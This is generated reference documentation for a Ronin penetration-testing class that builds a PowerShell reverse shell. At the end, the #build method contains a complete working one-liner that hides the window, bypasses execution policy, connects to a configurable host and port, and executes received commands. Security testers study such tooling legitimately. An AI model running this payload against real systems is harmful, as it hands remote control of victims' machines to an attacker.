Class: Ronin::Payloads::CMD::PowerShell::ReverseShell

Inherits:

Ronin::Payloads::CommandPayload

• Object
• Payload
• Ronin::Payloads::CommandPayload
• Ronin::Payloads::CMD::PowerShell::ReverseShell

Includes:

Mixins::ReverseShell

Defined in:

lib/ronin/payloads/builtin/cmd/powershell/reverse_shell.rb

Overview

A basic powershell reverse shell command.

Instance Attribute Summary

Attributes included from Mixins::PostEx

#session

Attributes inherited from Payload

#encoders, #payload

Instance Method Summary

• #build ⇒ Object

  Builds the powershell reverse shell command.

Methods included from Mixins::ReverseShell

#host, included, #perform_cleanup, #perform_postlaunch, #perform_prelaunch, #port

Methods included from Mixins::PostEx

#perform_cleanup

Methods inherited from Ronin::Payloads::CommandPayload

payload_type

Methods inherited from Payload

#built?, #built_payload, #bytesize, #cleanup, #encode_payload, #encoded_payload, encoder_class, #initialize, #length, payload_type, #perform_build, #perform_cleanup, #perform_postlaunch, #perform_prelaunch, #perform_validate, #postlaunch, #prelaunch, #rebuild_payload, #reencode_payload, register, #to_s, #validate

Constructor Details

This class inherits a constructor from Ronin::Payloads::Payload

Instance Method Details

#build ⇒ Object

Builds the powershell reverse shell command.

# File 'lib/ronin/payloads/builtin/cmd/powershell/reverse_shell.rb', line 45

def build
  @payload = %{powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(#{host.dump},#{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()}
end